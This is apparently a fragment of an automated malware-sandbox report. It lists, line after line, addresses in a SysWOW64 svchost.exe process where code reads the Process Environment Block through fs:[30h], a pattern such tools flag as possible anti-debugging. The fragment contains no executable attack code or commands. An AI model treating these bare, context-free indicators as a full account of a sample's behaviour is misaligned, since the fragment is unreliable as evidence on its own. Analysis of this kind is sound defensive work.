Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC62A0 mov eax, dword ptr fs:[00000030h]	1_2_02FC62A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC72A0 mov eax, dword ptr fs:[00000030h]	1_2_02FC72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC72A0 mov eax, dword ptr fs:[00000030h]	1_2_02FC72A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6329E mov eax, dword ptr fs:[00000030h]	1_2_02F6329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6329E mov eax, dword ptr fs:[00000030h]	1_2_02F6329E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]	1_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6E284 mov eax, dword ptr fs:[00000030h]	1_2_02F6E284
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]	1_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]	1_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB0283 mov eax, dword ptr fs:[00000030h]	1_2_02FB0283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F59274 mov eax, dword ptr fs:[00000030h]	1_2_02F59274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F71270 mov eax, dword ptr fs:[00000030h]	1_2_02F71270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F71270 mov eax, dword ptr fs:[00000030h]	1_2_02F71270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FE0274 mov eax, dword ptr fs:[00000030h]	1_2_02FE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]	1_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]	1_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F34260 mov eax, dword ptr fs:[00000030h]	1_2_02F34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFD26B mov eax, dword ptr fs:[00000030h]	1_2_02FFD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFD26B mov eax, dword ptr fs:[00000030h]	1_2_02FFD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2826B mov eax, dword ptr fs:[00000030h]	1_2_02F2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0300539D mov eax, dword ptr fs:[00000030h]	1_2_0300539D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2A250 mov eax, dword ptr fs:[00000030h]	1_2_02F2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEB256 mov eax, dword ptr fs:[00000030h]	1_2_02FEB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEB256 mov eax, dword ptr fs:[00000030h]	1_2_02FEB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F36259 mov eax, dword ptr fs:[00000030h]	1_2_02F36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F29240 mov eax, dword ptr fs:[00000030h]	1_2_02F29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F29240 mov eax, dword ptr fs:[00000030h]	1_2_02F29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB8243 mov eax, dword ptr fs:[00000030h]	1_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB8243 mov ecx, dword ptr fs:[00000030h]	1_2_02FB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6724D mov eax, dword ptr fs:[00000030h]	1_2_02F6724D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2823B mov eax, dword ptr fs:[00000030h]	1_2_02F2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030053FC mov eax, dword ptr fs:[00000030h]	1_2_030053FC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F67208 mov eax, dword ptr fs:[00000030h]	1_2_02F67208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F67208 mov eax, dword ptr fs:[00000030h]	1_2_02F67208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4E3F0 mov eax, dword ptr fs:[00000030h]	1_2_02F4E3F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F663FF mov eax, dword ptr fs:[00000030h]	1_2_02F663FF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEF3E6 mov eax, dword ptr fs:[00000030h]	1_2_02FEF3E6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]	1_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]	1_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]	1_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]	1_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]	1_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]	1_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]	1_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F403E9 mov eax, dword ptr fs:[00000030h]	1_2_02F403E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03005227 mov eax, dword ptr fs:[00000030h]	1_2_03005227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEB3D0 mov ecx, dword ptr fs:[00000030h]	1_2_02FEB3D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEC3CD mov eax, dword ptr fs:[00000030h]	1_2_02FEC3CD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3A3C0 mov eax, dword ptr fs:[00000030h]	1_2_02F3A3C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]	1_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]	1_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]	1_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F383C0 mov eax, dword ptr fs:[00000030h]	1_2_02F383C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB63C0 mov eax, dword ptr fs:[00000030h]	1_2_02FB63C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F533A5 mov eax, dword ptr fs:[00000030h]	1_2_02F533A5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F633A0 mov eax, dword ptr fs:[00000030h]	1_2_02F633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F633A0 mov eax, dword ptr fs:[00000030h]	1_2_02F633A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F8739A mov eax, dword ptr fs:[00000030h]	1_2_02F8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F8739A mov eax, dword ptr fs:[00000030h]	1_2_02F8739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]	1_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]	1_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F28397 mov eax, dword ptr fs:[00000030h]	1_2_02F28397
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]	1_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]	1_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2E388 mov eax, dword ptr fs:[00000030h]	1_2_02F2E388
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]	1_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5438F mov eax, dword ptr fs:[00000030h]	1_2_02F5438F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FD437C mov eax, dword ptr fs:[00000030h]	1_2_02FD437C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03005283 mov eax, dword ptr fs:[00000030h]	1_2_03005283
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F37370 mov eax, dword ptr fs:[00000030h]	1_2_02F37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F37370 mov eax, dword ptr fs:[00000030h]	1_2_02F37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F37370 mov eax, dword ptr fs:[00000030h]	1_2_02F37370
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FEF367 mov eax, dword ptr fs:[00000030h]	1_2_02FEF367
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F29353 mov eax, dword ptr fs:[00000030h]	1_2_02F29353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F29353 mov eax, dword ptr fs:[00000030h]	1_2_02F29353
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]	1_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]	1_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]	1_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB035C mov ecx, dword ptr fs:[00000030h]	1_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]	1_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB035C mov eax, dword ptr fs:[00000030h]	1_2_02FB035C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FFA352 mov eax, dword ptr fs:[00000030h]	1_2_02FFA352
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB2349 mov eax, dword ptr fs:[00000030h]	1_2_02FB2349
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2D34C mov eax, dword ptr fs:[00000030h]	1_2_02F2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2D34C mov eax, dword ptr fs:[00000030h]	1_2_02F2D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F27330 mov eax, dword ptr fs:[00000030h]	1_2_02F27330
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF132D mov eax, dword ptr fs:[00000030h]	1_2_02FF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF132D mov eax, dword ptr fs:[00000030h]	1_2_02FF132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5F32A mov eax, dword ptr fs:[00000030h]	1_2_02F5F32A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2C310 mov ecx, dword ptr fs:[00000030h]	1_2_02F2C310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030052E2 mov eax, dword ptr fs:[00000030h]	1_2_030052E2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F50310 mov ecx, dword ptr fs:[00000030h]	1_2_02F50310
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB930B mov eax, dword ptr fs:[00000030h]	1_2_02FB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB930B mov eax, dword ptr fs:[00000030h]	1_2_02FB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB930B mov eax, dword ptr fs:[00000030h]	1_2_02FB930B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]	1_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]	1_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6A30B mov eax, dword ptr fs:[00000030h]	1_2_02F6A30B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2C0F0 mov eax, dword ptr fs:[00000030h]	1_2_02F2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F720F0 mov ecx, dword ptr fs:[00000030h]	1_2_02F720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F550E4 mov eax, dword ptr fs:[00000030h]	1_2_02F550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F550E4 mov ecx, dword ptr fs:[00000030h]	1_2_02F550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_02F2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F380E9 mov eax, dword ptr fs:[00000030h]	1_2_02F380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB60E0 mov eax, dword ptr fs:[00000030h]	1_2_02FB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB20DE mov eax, dword ptr fs:[00000030h]	1_2_02FB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F590DB mov eax, dword ptr fs:[00000030h]	1_2_02F590DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov ecx, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov ecx, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov ecx, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov ecx, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F470C0 mov eax, dword ptr fs:[00000030h]	1_2_02F470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAD0C0 mov eax, dword ptr fs:[00000030h]	1_2_02FAD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAD0C0 mov eax, dword ptr fs:[00000030h]	1_2_02FAD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF60B8 mov eax, dword ptr fs:[00000030h]	1_2_02FF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF60B8 mov ecx, dword ptr fs:[00000030h]	1_2_02FF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03005152 mov eax, dword ptr fs:[00000030h]	1_2_03005152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FC80A8 mov eax, dword ptr fs:[00000030h]	1_2_02FC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F35096 mov eax, dword ptr fs:[00000030h]	1_2_02F35096
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5D090 mov eax, dword ptr fs:[00000030h]	1_2_02F5D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5D090 mov eax, dword ptr fs:[00000030h]	1_2_02F5D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F6909C mov eax, dword ptr fs:[00000030h]	1_2_02F6909C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F3208A mov eax, dword ptr fs:[00000030h]	1_2_02F3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FBD080 mov eax, dword ptr fs:[00000030h]	1_2_02FBD080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FBD080 mov eax, dword ptr fs:[00000030h]	1_2_02FBD080
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2D08D mov eax, dword ptr fs:[00000030h]	1_2_02F2D08D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov ecx, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F41070 mov eax, dword ptr fs:[00000030h]	1_2_02F41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5C073 mov eax, dword ptr fs:[00000030h]	1_2_02F5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FAD070 mov ecx, dword ptr fs:[00000030h]	1_2_02FAD070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB106E mov eax, dword ptr fs:[00000030h]	1_2_02FB106E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F32050 mov eax, dword ptr fs:[00000030h]	1_2_02F32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FD705E mov ebx, dword ptr fs:[00000030h]	1_2_02FD705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FD705E mov eax, dword ptr fs:[00000030h]	1_2_02FD705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F5B052 mov eax, dword ptr fs:[00000030h]	1_2_02F5B052
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB6050 mov eax, dword ptr fs:[00000030h]	1_2_02FB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF903E mov eax, dword ptr fs:[00000030h]	1_2_02FF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF903E mov eax, dword ptr fs:[00000030h]	1_2_02FF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF903E mov eax, dword ptr fs:[00000030h]	1_2_02FF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FF903E mov eax, dword ptr fs:[00000030h]	1_2_02FF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030051CB mov eax, dword ptr fs:[00000030h]	1_2_030051CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2A020 mov eax, dword ptr fs:[00000030h]	1_2_02F2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F2C020 mov eax, dword ptr fs:[00000030h]	1_2_02F2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]	1_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]	1_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]	1_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F4E016 mov eax, dword ptr fs:[00000030h]	1_2_02F4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_030061E5 mov eax, dword ptr fs:[00000030h]	1_2_030061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FB4000 mov ecx, dword ptr fs:[00000030h]	1_2_02FB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02FD71F9 mov esi, dword ptr fs:[00000030h]	1_2_02FD71F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F601F8 mov eax, dword ptr fs:[00000030h]	1_2_02F601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_02F551EF mov eax, dword ptr fs:[00000030h]	1_2_02F551EF
